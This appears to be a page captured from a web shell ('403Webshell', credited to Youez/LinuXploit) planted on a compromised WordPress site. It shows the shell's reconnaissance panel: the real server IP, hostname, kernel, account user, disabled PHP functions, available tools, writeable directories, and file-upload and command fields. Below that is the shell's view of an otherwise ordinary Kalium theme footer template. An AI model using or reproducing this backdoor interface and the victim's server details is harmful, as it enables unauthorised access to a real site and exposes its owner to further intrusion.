403Webshell
Server IP : 5.144.175.180  /  Your IP : 216.73.216.131
Web Server : Apache/2.4.63 (Unix) OpenSSL/1.1.1
System : Linux vpsgpz1.itsimplycom.it 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
User : edilchimica ( )
PHP Version : 7.4.33
Disable Function : getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,shell_exec,dl,exec,system,highlight_file,source,show_source,fpassthru,virtual,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix_getppid,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,symlink,posix_geteuid,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/edilchimica/webapps/edilchimica/wp-content/themes/edilchimica/tpls/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/edilchimica/webapps/edilchimica/wp-content/themes/edilchimica/tpls/footer-main.php
<?php
/**
 * Kalium WordPress Theme
 *
 * Laborator.co
 * www.laborator.co
 *
 * @deprecated 3.0 This template file will be removed or replaced with new one in templates/ folder.
 */
if ( ! defined( 'ABSPATH' ) ) {
	exit; // Direct access not allowed.
}

// Footer texts
$footer_text       = kalium_get_theme_option( 'footer_text' );
$footer_text_right = kalium_get_theme_option( 'footer_text_right' );

?>
<footer id="footer" role="contentinfo" <?php kalium_class_attr( kalium_get_footer_classes() ); ?>>

	<?php
	// Display footer widgets, if enabled
	if ( kalium_get_theme_option( 'footer_widgets' ) ) {
		get_template_part( 'tpls/footer-widgets' );
	}
	?>

	<?php if ( kalium_get_theme_option( 'footer_bottom_visible' ) ) : ?>

        <div class="footer-bottom">

            <div class="container">

                <div class="footer-bottom-content">

					<?php if ( $footer_text_right ) : ?>

                        <div class="footer-content-right">
							<?php echo do_shortcode( wp_kses_post( $footer_text_right ) ); ?>
                        </div>

					<?php endif; ?>

					<?php if ( $footer_text ) : ?>

                        <div class="footer-content-left">

                            <div class="copyrights site-info">
                                <p><?php echo do_shortcode( wp_kses_post( $footer_text ) ); ?></p>
                            </div>

                        </div>

					<?php endif; ?>
                </div>

            </div>

        </div>

	<?php endif; ?>

</footer>

Youez - 2016 - github.com/yon3zu
LinuXploit